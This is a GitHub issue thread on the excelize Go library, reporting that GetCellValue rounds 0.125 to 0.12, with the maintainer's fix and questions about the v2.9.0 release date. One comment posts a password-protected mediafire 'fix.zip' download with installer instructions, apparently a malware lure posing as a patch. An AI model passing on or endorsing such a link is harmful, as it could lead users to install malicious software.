### ISSUE TITLE
`GetCellValue` return unexpected decimal value

### ISSUE THREAD

**Issue by xixiwang12138** [qax-os/excelize#1979]
**Description**

where real cell value is `0.125`, it display `0.13` in Microsoft Excel™ .
but when using `GetCellValue` to read, it got `0.12`

**Describe the results you received:**
`0.12`
**Describe the results you expected:**
`0.13`
**Output of `go version`:**

```text
go version go1.21.9 darwin/arm64
```

**Excelize version or commit ID:**

```text
(paste here)
```

**Environment details (OS, Microsoft Excel™ version, physical, etc.):**

reason: (nf *numberFormat) numberHandler() use  `fmt.Sprintf` to format number, it's wrong
<img width="942" alt="image" src="https://github.com/user-attachments/assets/bc13ec34-4033-4a20-8416-b66011f7e635">

**Comment by royalkush** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by xixiwang12138** [comment]
this is my code: 
``` go
func TestReadData(t *testing.T) {
	p := "test.xlsx"
	f, err := excelize.OpenFile(p)
	if err != nil {
		panic(err)
	}
	data, err := f.GetCellValue("Sheet1", "A1")
	if err != nil {
		panic(err)
	}
	fmt.Println(data)
}
```
and the version of `excelize` is: `github.com/xuri/excelize/v2 v2.8.1`

attachment: 
[工作簿1.xlsx](https://github.com/user-attachments/files/16795729/1.xlsx)

**Comment by xixiwang12138** [comment]
> Thanks for your issue. Could you provide the workbook attachment without confidential info?

this is my code:

func TestReadData(t *testing.T) {
	p := "test.xlsx"
	f, err := excelize.OpenFile(p)
	if err != nil {
		panic(err)
	}
	data, err := f.GetCellValue("Sheet1", "A1")
	if err != nil {
		panic(err)
	}
	fmt.Println(data)
}
and the version of excelize is: github.com/xuri/excelize/v2 v2.8.1

attachment:
[工作簿1.xlsx](https://github.com/user-attachments/files/16795729/1.xlsx)

**Comment by xuri** [comment]
Thanks for your issue. This issue has been fixed, please upgrade to the master branch code by `go get -u github.com/xuri/excelize/v2@master`, and this patch will be released in the next version.

**Comment by xixiwang12138** [comment]
> Thanks for your issue. This issue has been fixed, please upgrade to the master branch code by `go get -u github.com/xuri/excelize/v2@master`, and this patch will be released in the next version.

when will the version `v2.9.0`  be released ?

**Comment by xuri** [comment]
We plan to release version 2.9.0 in October 2024, if test to stable.

**Comment by martinyonatann** [comment]
up

**Comment by xixiwang12138** [comment]
i really want to know when will the version v2.9.0 be released , thanks

**Comment by xuri** [comment]
The version 2.9.0 will be released on October 15, 2024.
